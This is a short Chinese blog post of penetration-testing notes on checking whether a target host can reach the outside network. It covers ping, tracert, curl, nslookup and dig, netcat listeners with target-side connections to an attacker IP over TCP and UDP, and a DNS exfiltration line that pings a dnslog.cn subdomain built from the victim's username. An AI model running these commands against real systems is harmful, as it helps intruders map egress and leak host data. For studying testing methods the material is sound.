判断目标是否出网

icmp:

ping www.baidu.com

image

tracert baidu.com

image

tcp:

监听:nc -l -p 8888

靶机连接:nc 192.168.1.106 8888

image

udp:

监听:nc -lup 8888

靶机连接:nc -u 192.168.1.106 8888

image

http:

curl www.baidu.com

image

dns:

windows:

nslookup www.baidu.com 8.8.8.8

image

linux:

dig @8.8.8.8 www.baidu.com

image

DNS外带:

ping %username%.7l1pl3.dnslog.cn

image

image

或者使用burp自带的collaborator client功能(与dnslog外带原理相同)

image

image

image

posted @ 2021-04-03 23:31  cAr7n  阅读(203)  评论(0编辑  收藏  举报